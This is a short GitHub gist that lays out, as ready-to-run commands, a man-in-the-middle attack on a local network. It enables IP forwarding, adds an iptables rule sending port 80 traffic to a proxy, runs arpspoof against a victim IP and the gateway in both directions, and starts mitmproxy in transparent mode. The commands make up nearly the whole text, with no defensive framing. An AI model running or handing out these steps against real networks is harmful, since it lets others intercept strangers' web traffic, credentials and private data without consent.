Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save angeloped/225a6aac5147c5edbabe2501cb6eae68 to your computer and use it in GitHub Desktop.
Save angeloped/225a6aac5147c5edbabe2501cb6eae68 to your computer and use it in GitHub Desktop.
Intercept HTTP Traffic with Mitmproxy and Arpspoof on Kali Linux
  1. Enable IP forwarding & port redirection
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
  1. Use tmux to run 2 instances of arpspoof:
arpspoof -i $INTERFACE -t $VICTIM_IP $GATEWAY_IP
arpspoof -i $INTERFACE -t $GATEWAY_IP $VICTIM_IP
  1. Run mitmproxy in transparent mode:
mitmproxy -T --host

Source

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment